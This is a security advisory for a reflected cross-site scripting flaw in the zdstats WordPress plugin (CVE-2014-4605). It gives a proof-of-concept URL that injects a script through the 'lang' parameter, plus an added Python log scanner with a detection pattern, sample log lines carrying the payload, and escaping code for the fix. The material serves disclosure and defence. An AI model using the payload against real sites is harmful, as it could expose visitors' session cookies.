wp-plugin : zdstats – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : zdstats

 

Affected Version : 2.0.1 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/zdstats/cal/test.php?lang="></script><script>alert(document.cookie)</script>&

Vulnerable Parameter : 'lang'
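A defender-side check for this issue, added here as an example and not part of the original advisory or the plugin's code: it scans Apache-style access-log lines for requests to the affected endpoint whose `lang` value contains characters that break out of an attribute or script context, and shows the escaping shape that stops a reflected value from closing an attribute. The log lines, client IPs and the language allow-list are constructed assumptions.

```python
import re
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
# The second line carries the advisory's PoC value, percent-encoded as a browser would send it.
SAMPLE_LOG = """\
203.0.113.5 - - [28/May/2014:10:01:12 +0000] "GET /wp-content/plugins/zdstats/cal/test.php?lang=fr HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [28/May/2014:10:02:44 +0000] "GET /wp-content/plugins/zdstats/cal/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.7 - - [28/May/2014:10:03:01 +0000] "GET /index.php?p=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Request line inside the log entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
VULN_PATH = "/wp-content/plugins/zdstats/cal/test.php"   # endpoint named in the advisory
VULN_PARAM = "lang"                                       # reflected parameter
# A language code never legitimately contains quotes, angle brackets or script
# keywords; any of these in the value is a context-break attempt worth flagging.
SUSPECT_RE = re.compile(r'[<>"\']|script|javascript:', re.IGNORECASE)


def extract_lang(line):
    """Return (client_ip, decoded lang value) for a request to the affected
    endpoint, or None when the line is not a request to that endpoint."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes the value, so the check sees what the page would echo.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if VULN_PARAM not in qs:
        return None
    client_ip = line.split(" ", 1)[0]
    return client_ip, qs[VULN_PARAM][0]


def find_xss_attempts(log_text):
    """Return a list of (client_ip, lang value) for requests whose lang value
    would break out of an HTML attribute or script context if echoed verbatim."""
    hits = []
    for line in log_text.splitlines():
        rec = extract_lang(line)
        if rec and SUSPECT_RE.search(rec[1]):
            hits.append(rec)
    return hits


def escape_for_attr(value):
    """Output-encoding shape for the fix: escape &, <, > and both quote styles
    before the value is placed inside a double-quoted HTML attribute."""
    return html.escape(value, quote=True)


def render_lang_attr(value, allowed=("en", "fr", "de", "es")):
    """Belt-and-braces handling for a language code (allow-list is a constructed
    assumption): fall back to a default for unknown codes, then escape anyway so
    a future change to the allow-list cannot reintroduce the injection."""
    code = value if value in allowed else "en"
    return 'data-lang="%s"' % escape_for_attr(code)


if __name__ == "__main__":
    for ip, value in find_xss_attempts(SAMPLE_LOG):
        print("suspect lang value from %s: %r" % (ip, value))
    print(render_lang_attr('"></script><script>alert(document.cookie)</script>'))
```

Run against a real access log, the same `find_xss_attempts` call on the file's contents gives the list of clients that probed the endpoint; `escape_for_attr` alone is what turns the PoC value into inert text (`&quot;&gt;&lt;/script&gt;...`), and the allow-list in `render_lang_attr` removes the reflected input altogether.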

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

Plugin Status : Updated

Public Disclosure : May 28, 2014

CVE Number : CVE-2014-4605


Plugin Description :

ZdStatistics is a WordPress plugin allowing you to trace your visitors. This is not a simple statistics plugin; it is very flexible and dynamic. This means you can update your filters yourself and therefore be as realistic as possible.

Here is a list of functions :

* Display a summary of visits (week, month, trimester, semester and year)
* Display Pageviews and visitors with daily precision
* Referring pages
* Used keywords
* Localization of your visitors
* Browser / OS
* Outgoing links

The statistics are collected and, if you choose so via an option, processed instantly. You can also separate feeds from real pageviews, exclude some IPs from being collected (@home, @work, @school, etc.) and choose whether or not robot pageviews are collected.
